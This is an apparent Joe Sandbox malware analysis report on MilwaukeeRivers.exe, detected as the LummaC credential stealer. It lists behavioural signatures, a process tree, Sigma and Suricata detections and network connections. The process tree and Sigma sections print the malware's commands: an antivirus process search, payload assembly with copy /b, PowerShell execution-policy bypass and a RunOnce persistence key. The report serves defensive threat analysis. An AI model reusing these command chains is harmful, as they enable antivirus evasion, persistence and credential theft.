Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MilwaukeeRivers.exe

Overview

General Information

Sample name:MilwaukeeRivers.exe
Analysis ID:1547706
MD5:e922a4d7d2c3c937231aa937b9a2ad25
SHA1:b78ade0fbd78bff01d5c86079c9224d7b87f0770
SHA256:bdc7b917477bb49af7a5b06e5d9ed20e08fed25944f297a6b36a50d03d8a5777
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected LummaC Stealer
Yara detected UAC Bypass using CMSTP
Allocates memory in foreign processes
Connects to a pastebin service (likely for C&C)
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Query firmware table information (likely to detect VMs)
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Copy From or To System Directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64_ra
  • MilwaukeeRivers.exe (PID: 3908 cmdline: "C:\Users\user\Desktop\MilwaukeeRivers.exe" MD5: E922A4D7D2C3C937231AA937B9A2AD25)
    • cmd.exe (PID: 6944 cmdline: "C:\Windows\System32\cmd.exe" /c copy Te Te.bat & Te.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6860 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6872 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7140 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6256 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7124 cmdline: cmd /c md 215655 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 6336 cmdline: findstr /V "GeologicalAllowStoryVirtually" Commitments MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6276 cmdline: cmd /c copy /b ..\Started + ..\Spend + ..\Seek + ..\Etc + ..\Reliability + ..\Lingerie + ..\Washing g MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Comparing.pif (PID: 6288 cmdline: Comparing.pif g MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • OHFHODKJNOQ3LDHM.exe (PID: 6532 cmdline: "C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe" MD5: 8FE60FF1954FF81AD6CAFF83914CF088)
          • more.com (PID: 3548 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
            • conhost.exe (PID: 2744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • explorer.exe (PID: 2120 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
        • powershell.exe (PID: 4888 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • AutoIt3.exe (PID: 1428 cmdline: "C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe" "C:\Users\user\AppData\Local\Temp\LRAKKJ\Afflicted.a3x" MD5: 3F58A517F1F4796225137E7659AD2ADB)
          • GoogleUpdateCore.exe (PID: 5692 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 2464 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 3312 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 3364 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 4416 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 2840 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 2336 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 3540 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 4132 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 6064 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 7032 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 7048 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 6232 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 6264 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 1788 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 552 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 7128 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 6576 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 6564 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 6600 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 6560 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 364 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 1960 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 640 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 716 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 6092 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 1436 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 4952 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 3292 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 7028 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 7060 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 5888 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 1164 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 3916 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 3920 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 6044 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 3720 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 4808 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 4112 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
          • GoogleUpdateCore.exe (PID: 1640 cmdline: "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" MD5: 021C57C74DE40F7C3B4FCF58A54D3649)
      • choice.exe (PID: 6300 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • svchost.exe (PID: 7040 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000003.1864702800.00000000014A2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
    00000016.00000002.2155048101.0000000004BC4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000019.00000002.2404382599.0000000005102000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        0000000C.00000002.2521442122.0000000000D5F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Suspicious PowerShell Parameter Substring
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Comparing.pif g, ParentImage: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif, ParentProcessId: 6288, ParentProcessName: Comparing.pif, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", ProcessId: 4888, ProcessName: powershell.exe
          Sigma detected: Suspicious Script Execution From Temp Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Comparing.pif g, ParentImage: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif, ParentProcessId: 6288, ParentProcessName: Comparing.pif, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", ProcessId: 4888, ProcessName: powershell.exe
          Sigma detected: Change PowerShell Policies to an Insecure Level
          Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Comparing.pif g, ParentImage: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif, ParentProcessId: 6288, ParentProcessName: Comparing.pif, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", ProcessId: 4888, ProcessName: powershell.exe
          Sigma detected: CurrentVersion Autorun Keys Modification
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\hbcfbdf\AutoIt3.exe" C:\hbcfbdf\ebhhaeg.a3x, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe, ProcessId: 1428, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ebhhaeg
          Sigma detected: Execution of Suspicious File Type Extension
          Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Comparing.pif g, CommandLine: Comparing.pif g, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Te Te.bat & Te.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6944, ParentProcessName: cmd.exe, ProcessCommandLine: Comparing.pif g, ProcessId: 6288, ProcessName: Comparing.pif
          Sigma detected: Suspicious Copy From or To System Directory
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Te Te.bat & Te.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Te Te.bat & Te.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\MilwaukeeRivers.exe", ParentImage: C:\Users\user\Desktop\MilwaukeeRivers.exe, ParentProcessId: 3908, ParentProcessName: MilwaukeeRivers.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Te Te.bat & Te.bat, ProcessId: 6944, ProcessName: cmd.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Comparing.pif g, ParentImage: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif, ParentProcessId: 6288, ParentProcessName: Comparing.pif, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1", ProcessId: 4888, ProcessName: powershell.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7040, ProcessName: svchost.exe

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Sigma detected: Search for Antivirus process
          Source: Process startedAuthor: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Te Te.bat & Te.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6944, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 6256, ProcessName: findstr.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-02T22:43:20.544444+010020283713Unknown Traffic192.168.2.1649711104.21.32.51443TCP
          2024-11-02T22:43:20.544444+010020283713Unknown Traffic192.168.2.1649711104.21.32.51443TCP
          2024-11-02T22:43:22.016016+010020283713Unknown Traffic192.168.2.1649712104.21.32.51443TCP
          2024-11-02T22:43:22.016016+010020283713Unknown Traffic192.168.2.1649712104.21.32.51443TCP
          2024-11-02T22:43:23.490359+010020283713Unknown Traffic192.168.2.1649713104.21.32.51443TCP
          2024-11-02T22:43:23.490359+010020283713Unknown Traffic192.168.2.1649713104.21.32.51443TCP
          2024-11-02T22:43:25.040508+010020283713Unknown Traffic192.168.2.1649714104.21.32.51443TCP
          2024-11-02T22:43:25.040508+010020283713Unknown Traffic192.168.2.1649714104.21.32.51443TCP
          2024-11-02T22:43:26.686661+010020283713Unknown Traffic192.168.2.1649715104.21.32.51443TCP
          2024-11-02T22:43:26.686661+010020283713Unknown Traffic192.168.2.1649715104.21.32.51443TCP
          2024-11-02T22:43:28.148926+010020283713Unknown Traffic192.168.2.1649716104.21.32.51443TCP
          2024-11-02T22:43:28.148926+010020283713Unknown Traffic192.168.2.1649716104.21.32.51443TCP
          2024-11-02T22:43:29.279003+010020283713Unknown Traffic192.168.2.1649717104.21.32.51443TCP
          2024-11-02T22:43:29.279003+010020283713Unknown Traffic192.168.2.1649717104.21.32.51443TCP
          2024-11-02T22:43:30.704957+010020283713Unknown Traffic192.168.2.1649718104.21.32.51443TCP
          2024-11-02T22:43:30.704957+010020283713Unknown Traffic192.168.2.1649718104.21.32.51443TCP
          2024-11-02T22:43:34.063945+010020283713Unknown Traffic192.168.2.1649719104.21.32.51443TCP
          2024-11-02T22:43:34.063945+010020283713Unknown Traffic192.168.2.1649719104.21.32.51443TCP
          2024-11-02T22:43:35.771884+010020283713Unknown Traffic192.168.2.1649720188.114.96.3443TCP
          2024-11-02T22:43:35.771884+010020283713Unknown Traffic192.168.2.1649720188.114.96.3443TCP
          2024-11-02T22:43:45.041673+010020283713Unknown Traffic192.168.2.1649721172.67.75.40443TCP
          2024-11-02T22:43:45.041673+010020283713Unknown Traffic192.168.2.1649721172.67.75.40443TCP
          2024-11-02T22:43:45.854972+010020283713Unknown Traffic192.168.2.1649722188.114.97.3443TCP
          2024-11-02T22:43:45.854972+010020283713Unknown Traffic192.168.2.1649722188.114.97.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-02T22:44:19.811419+010028561471A Network Trojan was detected192.168.2.1649726172.67.182.11980TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-02T22:44:17.298025+010028561481A Network Trojan was detected192.168.2.1649725172.67.182.11980TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-02T22:44:14.879941+010028560971A Network Trojan was detected192.168.2.1649724172.67.182.11980TCP
          2024-11-02T22:44:19.811419+010028560971A Network Trojan was detected192.168.2.1649726172.67.182.11980TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\rrwkeebJoe Sandbox ML: detected

          Exploits

          barindex
          Yara detected UAC Bypass using CMSTP
          Source: Yara matchFile source: 00000016.00000002.2155048101.0000000004BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.2404382599.0000000005102000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: MilwaukeeRivers.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49712 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49713 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49714 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49715 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49717 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49718 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49719 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.16:49720 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.75.40:443 -> 192.168.2.16:49721 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49722 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.16:49723 version: TLS 1.2
          Source: MilwaukeeRivers.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
          Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
          Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
          Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
          Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
          Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
          Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
          Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
          Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
          Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
          Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
          Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
